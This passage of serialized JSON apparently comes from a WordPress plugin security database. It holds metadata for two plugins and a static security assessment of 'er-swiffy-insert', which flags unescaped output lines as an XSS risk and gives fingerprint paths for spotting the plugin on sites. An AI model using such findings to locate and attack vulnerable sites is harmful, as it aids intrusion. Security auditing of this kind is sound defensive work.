re-factoring\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>2.0\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Add possibility to include \u003Cstrong>posts\u003C\u002Fstrong> from a facebook page.\u003C\u002Fli>\n\u003Cli>Add possibility to include tweets from a twitter timeline.\u003C\u002Fli>\n\u003Cli>Include new shortcodes: \u003Cstrong>[twl_page_in_wp]\u003C\u002Fstrong> for inserting a WordPress page, \u003Cstrong>[twl_page_in_fb]\u003C\u002Fstrong> for inserting Facebook posts and \u003Cstrong>[twl_page_in_tw]\u003C\u002Fstrong> for inserting user tweets.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>1.0\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Initial version of plugin\u003C\u002Fli>\n\u003C\u002Ful>\n","This plugin helps you insert a post or page from the WP posts database table within another, bring your Facebook posts and Twitter feeds to your blog.",200,7715,72,5,"2014-02-24T11:48:00.000Z","3.7.41","3.0.1",[144,145,146,23,147],"insert-post-in-page","page","post","widget","http:\u002F\u002Fcyriltata.blogspot.com\u002F2013\u002F11\u002Fwordpress-plugin-page-in-page.html","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpage-in-page.2.0.3.zip",{"slug":151,"name":152,"version":67,"author":153,"author_profile":154,"description":155,"short_description":156,"active_installs":60,"downloaded":157,"rating":158,"num_ratings":14,"last_updated":159,"tested_up_to":160,"requires_at_least":161,"requires_php":18,"tags":162,"homepage":165,"download_link":166,"security_score":79,"vuln_count":80,"unpatched_count":80,"last_vuln_date":37,"fetched_at":81},"insert-title","Insert Title","Harman Singh Hira","https:\u002F\u002Fprofiles.wordpress.org\u002Fjatthira\u002F","\u003Cp>This plugin simply Insert post’s or page’s title in content area. If you are really sick of copying and pasting title in content again and again, then simply use this plugin because it comes with Shortcode button. Click on button from editor to insert the title of the page.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Insert \u003Cstrong>“Post’s or Page’s”\u003C\u002Fstrong> title easily and use it within Content area\u003C\u002Fli>\n\u003Cli>Insert Shortcode using Visual Editor or Text Editor\u003C\u002Fli>\n\u003Cli>Simple Shortcode functionality\u003C\u002Fli>\n\u003Cli>SEO Friendly\u003C\u002Fli>\n\u003Cli>Mobile and Mobile theme’s friendly\u003C\u002Fli>\n\u003Cli>Simple lightweight Plugin\u003C\u002Fli>\n\u003Cli>Easy to use\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Resources\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.ultimatetech.org\u002Finsert-title-wordpress-plugin\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Finsert-title\" rel=\"ugc\">Support\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.ultimatetech.org\u002F?p=344#report_bug\" rel=\"nofollow ugc\">Report Bugs\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","This plugin simply Insert post's or page's title in content area. If you are really sick of copying and pasting title in content again and a &hellip;",1853,40,"2017-07-05T07:38:00.000Z","4.8.28","3.3",[163,151,164,23,122],"html","javascript","https:\u002F\u002Fultimatetech.org\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finsert-title.zip",{"attackSurface":168,"codeSignals":199,"taintFlows":212,"riskAssessment":213,"analyzedAt":223},{"hooks":169,"ajaxHandlers":192,"restRoutes":193,"shortcodes":194,"cronEvents":198,"entryPointCount":14,"unprotectedCount":80},[170,176,180,184,188],{"type":171,"name":172,"callback":173,"file":174,"line":175},"action","admin_enqueue_scripts","admin_assets","er-swiffy-insert.php",31,{"type":171,"name":177,"callback":178,"file":174,"line":179},"wp_enqueue_scripts","assets",32,{"type":171,"name":181,"callback":182,"file":174,"line":183},"admin_menu","create_admin_menu",35,{"type":171,"name":185,"callback":186,"file":174,"line":187},"wp_head","enqueue_head",41,{"type":171,"name":189,"callback":190,"file":174,"line":191},"wp_footer","enqueue_footer",44,[],[],[195],{"tag":24,"callback":196,"file":174,"line":197},"register_shortcode",38,[],{"dangerousFunctions":200,"sqlUsage":201,"outputEscaping":203,"fileOperations":80,"externalRequests":80,"nonceChecks":80,"capabilityChecks":80,"bundledLibraries":211},[],{"prepared":80,"raw":80,"locations":202},[],{"escaped":80,"rawEcho":49,"locations":204},[205,208,210],{"file":174,"line":206,"context":207},82,"raw output",{"file":174,"line":209,"context":207},107,{"file":174,"line":209,"context":207},[],[],{"summary":214,"deductions":215},"The er-swiffy-insert plugin v1.0.0 exhibits a generally good security posture based on static analysis, with no direct vulnerabilities flagged in taint analysis or a history of recorded CVEs. The absence of dangerous functions, external HTTP requests, and file operations are positive indicators.  SQL queries are also safely implemented using prepared statements. However, a significant concern arises from the lack of output escaping.  With 100% of its outputs unescaped, this presents a clear risk of Cross-Site Scripting (XSS) vulnerabilities, especially given that the plugin has at least one shortcode, which is a common entry point for user-provided data that can be rendered to the page. The complete absence of nonce and capability checks, while not directly tied to an exposed entry point in this analysis, indicates a lack of defense-in-depth, making any future expansion of the attack surface potentially more vulnerable.",[216,219,221],{"reason":217,"points":218},"Unescaped output detected",8,{"reason":220,"points":139},"No nonce checks present",{"reason":222,"points":139},"No capability checks present","2026-03-16T23:44:38.431Z",{"wat":225,"direct":235},{"assetPaths":226,"generatorPatterns":229,"scriptPaths":230,"versionParams":232},[227,228],"\u002Fwp-content\u002Fplugins\u002Fer-swiffy-insert\u002Fjs\u002Fer-swiffy-insert.js","\u002Fwp-content\u002Fplugins\u002Fer-swiffy-insert\u002Fcss\u002Fer-swiffy-insert.css",[],[231],"https:\u002F\u002Fwww.gstatic.com\u002Fswiffy\u002Fv",[233,234],"er-swiffy-insert\u002Fjs\u002Fer-swiffy-insert.js?ver=","er-swiffy-insert\u002Fcss\u002Fer-swiffy-insert.css?ver=",{"cssClasses":236,"htmlComments":237,"htmlAttributes":238,"restEndpoints":239,"jsGlobals":240,"shortcodeOutput":242},[],[],[],[],[241],"swiffyobject_",[243],"\u003Cdiv id='swiffycontainer_",{"error":245,"url":246,"statusCode":247,"statusMessage":248,"message":248},true,"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fer-swiffy-insert\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":80,"versions":250},[]]